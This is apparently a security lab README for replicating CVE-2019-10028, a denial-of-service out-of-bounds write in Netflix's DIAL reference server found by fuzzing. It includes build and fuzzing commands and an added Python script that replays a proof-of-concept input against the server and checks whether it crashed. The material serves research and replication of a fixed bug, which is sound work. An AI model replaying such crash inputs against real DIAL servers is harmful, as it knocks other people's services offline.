This repo replicates finding CVE-2019-10028, a denial-of-service bug caused by an out-of-bounds write in Netflix's DIAL (Discovery and Launch) protocol reference server (CVSS score: 7.5).
We reported this bug responsibly to the maintainers, and the fix has been implemented here.
Note: since the bug is found in an unmodified binary that is a network target, it can only be found by fuzzers that support network fuzzing (such as Mayhem).
Assuming you just want to build the docker image, run:
docker build -t forallsecure/netflix-cve-2019-10028 .
If you don't want to build locally, you can pull a pre-built image directly from dockerhub:
docker pull forallsecure/netflix-cve-2019-10028
Change to the netflix-cve-2019-10028 folder and run:
mayhem run mayhem/dial
and watch Mayhem replicate the bug! This bug takes some time (~6 hours) to find, so be patient!
Since this is an uninstrumented network binary, it cannot easily be fuzzed locally. However, [Mayhem](https://www.forallsecure.com/solutions/devsecops/) can easily take care of this!
We have included a proof of concept output under the poc directory.
Note: Fuzzing has some degree of non-determinism, so when you run yourself you may not get exactly this file. This is expected; your output should still trigger the Netflix dial bug.
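The following script, added here as an example and not part of this lab or of the Netflix dial-reference project, replays one of those PoC files against a running container and then checks whether the server is still accepting connections. It assumes two things the README does not state: that a PoC file holds the raw bytes Mayhem delivered to the server's TCP socket, and that the container exposes the DIAL server on TCP port 56789 (the dial-reference default as far as I know; confirm with `docker port <container>` before relying on it). The mock server at the bottom is a constructed stand-in so the script can be exercised offline.

```python
"""Replay a fuzzer test case against the DIAL server's TCP listener and
report whether the server survived.

Added example for this README; not code from the vulnerability lab or from
the Netflix dial-reference project. Assumptions (not stated on the page):
the file under poc/ is the raw byte stream Mayhem sent to the server, and
the container exposes the server on TCP port 56789.
"""
import socket
import sys
import threading

# Assumed defaults for the dockerised target; adjust to match your container.
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 56789


def replay_testcase(payload, host, port, timeout=5.0):
    """Deliver one test case and record how the peer behaved.

    Returns {"outcome": ..., "response": bytes}, where outcome is one of
      "closed"  - peer answered and/or sent a clean EOF (process still alive)
      "reset"   - peer aborted the connection (what a dying process with
                  unread request data looks like from outside)
      "timeout" - peer neither answered nor closed within `timeout`
      "refused" - nothing listening (server already gone, or wrong port)
    """
    result = {"outcome": "timeout", "response": b""}
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(payload)
            chunks = []
            while True:
                try:
                    data = sock.recv(4096)
                except socket.timeout:
                    break
                except ConnectionResetError:
                    result["outcome"] = "reset"
                    break
                if not data:
                    result["outcome"] = "closed"
                    break
                chunks.append(data)
            result["response"] = b"".join(chunks)
    except ConnectionRefusedError:
        result["outcome"] = "refused"
    return result


def still_listening(host, port, timeout=2.0):
    """True if a fresh TCP connect succeeds, i.e. the server survived the replay."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def start_mock_server(response):
    """Constructed stand-in for the real target, for offline use only:
    accepts a single connection, reads one request, sends `response`, and
    closes. The listener is closed before replying, so a second connect to
    the returned port is refused, just like a server that died."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    def serve():
        conn, _ = listener.accept()
        listener.close()  # single-shot: stop listening before we answer
        with conn:
            conn.recv(4096)
            conn.sendall(response)

    threading.Thread(target=serve, daemon=True).start()
    return port


def main(argv):
    """usage: replay_poc.py poc/<testcase> [host] [port]; exit 1 if the server died."""
    if len(argv) < 2:
        print("usage: replay_poc.py poc/<testcase> [host] [port]", file=sys.stderr)
        return 2
    host = argv[2] if len(argv) > 2 else DEFAULT_HOST
    port = int(argv[3]) if len(argv) > 3 else DEFAULT_PORT
    with open(argv[1], "rb") as f:
        payload = f.read()
    result = replay_testcase(payload, host, port)
    alive = still_listening(host, port)
    print(f"outcome={result['outcome']} bytes_back={len(result['response'])} "
          f"server_still_listening={alive}")
    return 0 if alive else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 replay_poc.py poc/<file> 127.0.0.1 56789` against the container. An outcome of "reset", or a clean "closed" followed by "server_still_listening=False", is what a process killed by the out-of-bounds write looks like from the network side; "closed" with a response and the server still listening means that input did not crash it, which can happen given the non-determinism noted above. The script checks both signals because a dying process that still had unread request data in its socket shows up as a reset, while one that had already drained the request shows up as a normal close and only the failed reconnect reveals the crash.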
This bug was originally found by ForAllSecure intern Zion Basque, and it has since been fixed by the project maintainers.